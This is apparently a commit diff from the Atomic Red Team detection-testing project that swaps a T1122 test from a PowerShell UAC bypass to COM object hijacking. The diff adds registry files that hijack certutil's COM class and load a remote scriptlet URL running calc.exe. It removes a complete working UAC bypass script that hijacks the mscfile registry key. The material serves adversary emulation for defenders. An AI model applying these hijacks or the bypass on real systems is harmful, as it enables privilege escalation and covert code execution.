Component Object Model Hijacking (#354)

* Component Object Model Hijacking * Update T1122.yaml * Generate docs from job=validate_atomics_generate_docs branch=Fix-1122-COMHijack
2018-09-28 13:08:15 -06:00
parent 789b2cfc59
commit a61dbfbbb5
9 changed files with 74 additions and 106 deletions
@@ -16,19 +16,21 @@ Contributors: ENDGAME</blockquote>

 ## Atomic Tests

- [Atomic Test #1 - PowerShell UAC Bypass](#atomic-test-1---powershell-uac-bypass)
+- [Atomic Test #1 - Component Object Model Hijacking](#atomic-test-1---component-object-model-hijacking)


 <br/>

-## Atomic Test #1 - PowerShell UAC Bypass
-PowerShell EventViewer Bypass by Matt Nelson
+## Atomic Test #1 - Component Object Model Hijacking
+Hijack COM Object used by certutil.exe

 **Supported Platforms:** Windows


-#### Run it with `powershell`!
+#### Run it with `command_prompt`!
 ```
-Invoke-EventVwrBypass.ps1
+reg import ..\src\COMHijack.reg
+certutil.exe -CAInfo
+reg import ..\src\COMHijackCleanup.reg
 ```
 <br/>
@@ -1,15 +1,17 @@
 ---
 attack_technique: T1122
-display_name: Bypass User Account Control
+display_name: Component Object Model Hijacking

 atomic_tests:
- name: PowerShell UAC Bypass
+- name: Component Object Model Hijacking
  description: |
-    PowerShell EventViewer Bypass by Matt Nelson
+    Hijack COM Object used by certutil.exe

  supported_platforms:
    - windows
  executor:
-    name: powershell
+    name: command_prompt
    command: |
-      Invoke-EventVwrBypass.ps1
+      reg import ..\src\COMHijack.reg
+      certutil.exe -CAInfo
+      reg import ..\src\COMHijackCleanup.reg
@@ -0,0 +1,25 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="AtomicRedTeam"
+    progid="AtomicRedTeam"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+    remotable="true"
+	>
+	
+
+	<script language="JScript">
+	<![CDATA[
+
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+
+
+	]]>
+	</script>
+
+
+</registration>
+
+</scriptlet>
@@ -0,0 +1,23 @@
+Windows Registry Editor Version 5.00
+[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
+@="AtomicRedTeam"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
+@="{00000001-0000-0000-0000-0000FEEDACDC}"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
+@="AtomicRedTeam"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
+@="{00000001-0000-0000-0000-0000FEEDACDC}"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
+@="AtomicRedTeam"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
+@="C:\\WINDOWS\\system32\\scrobj.dll"
+"ThreadingModel"="Apartment"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
+@="AtomicRedTeam.1.00"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
+@="https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
+@="AtomicRedTeam"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs]
+@="{00000001-0000-0000-0000-0000FEEDACDC}"
@@ -0,0 +1,5 @@
+Windows Registry Editor Version 5.00
+[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
+[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
+[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
+[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
@@ -1,92 +0,0 @@
-function Invoke-EventVwrBypass {
-<#
-.SYNOPSIS
-
-Bypasses UAC by performing an image hijack on the .msc file extension
-Expected to work on Win7, 8.1 and Win10
-
-Only tested on Windows 7 and Windows 10
-
-Author: Matt Nelson (@enigma0x3)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
-
-Source: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
-
-.PARAMETER Command
-
- Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc <encodedCommand>"
-
-.EXAMPLE
-
-Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA="
-
-This will write out "Is Elevated: True" to C:\UACBypassTest.
-
-#>
-
-    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
-    Param (
-        [Parameter(Mandatory = $True)]
-        [ValidateNotNullOrEmpty()]
-        [String]
-        $Command,
-
-        [Switch]
-        $Force
-    )
-    $ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
-    $SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop
-
-    if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){
-        "UAC is set to 'Always Notify'. This module does not bypass this setting."
-        exit
-    }
-    else{
-        #Begin Execution
-        $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command"
-        $Command = $pshome + '\' + $Command
-        #Add in the new registry entries to hijack the msc file
-        if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){
-            New-Item $mscCommandPath -Force |
-                New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
-        }else{
-            Write-Warning "Key already exists, consider using -Force"
-            exit
-        }
-
-        if (Test-Path $mscCommandPath) {
-            Write-Verbose "Created registry entries to hijack the msc extension"
-        }else{
-            Write-Warning "Failed to create registry key, exiting"
-            exit
-        }
-
-        $EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe'
-        #Start Event Viewer
-        if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) {
-            $Process = Start-Process -FilePath $EventvwrPath -PassThru
-            Write-Verbose "Started eventvwr.exe"
-        }
-
-        #Sleep 5 seconds 
-        Write-Verbose "Sleeping 5 seconds to trigger payload"
-        if (-not $PSBoundParameters['WhatIf']) {
-            Start-Sleep -Seconds 5
-        }
-
-        $mscfilePath = "HKCU:\Software\Classes\mscfile"
-
-        if (Test-Path $mscfilePath) {
-            #Remove the registry entry
-            Remove-Item $mscfilePath -Recurse -Force
-            Write-Verbose "Removed registry entries"
-        }
-
-        if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){
-            Stop-Process -Id $Process.Id
-            Write-Verbose "Killed running eventvwr process"
-        }
-    }
-}
@@ -0,0 +1,3 @@
+reg import COMHijack.reg
+certutil.exe -CAInfo
+reg import COMHijackCleanup.reg
@@ -28,7 +28,7 @@
  - Atomic Test #1: Change Default File Association [windows]
 - T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1122 Component Object Model Hijacking](./T1122/T1122.md)
-  - Atomic Test #1: PowerShell UAC Bypass [windows]
+  - Atomic Test #1: Component Object Model Hijacking [windows]
 - [T1136 Create Account](./T1136/T1136.md)
  - Atomic Test #1: Create a user account on a Linux system [linux]
  - Atomic Test #2: Create a user account on a MacOS system [macos]
@@ -141,7 +141,7 @@
 - T1116 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1122 Component Object Model Hijacking](./T1122/T1122.md)
-  - Atomic Test #1: PowerShell UAC Bypass [windows]
+  - Atomic Test #1: Component Object Model Hijacking [windows]
 - T1196 Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1207 DCShadow](./T1207/T1207.md)
  - Atomic Test #1: DCShadow - Mimikatz [windows]
@@ -13,7 +13,7 @@
 - T1116 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1122 Component Object Model Hijacking](./T1122/T1122.md)
-  - Atomic Test #1: PowerShell UAC Bypass [windows]
+  - Atomic Test #1: Component Object Model Hijacking [windows]
 - T1196 Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1207 DCShadow](./T1207/T1207.md)
  - Atomic Test #1: DCShadow - Mimikatz [windows]
@@ -167,7 +167,7 @@
  - Atomic Test #1: Change Default File Association [windows]
 - T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1122 Component Object Model Hijacking](./T1122/T1122.md)
-  - Atomic Test #1: PowerShell UAC Bypass [windows]
+  - Atomic Test #1: Component Object Model Hijacking [windows]
 - [T1136 Create Account](./T1136/T1136.md)
  - Atomic Test #3: Create a new user in a command prompt [windows]
  - Atomic Test #4: Create a new user in PowerShell [windows]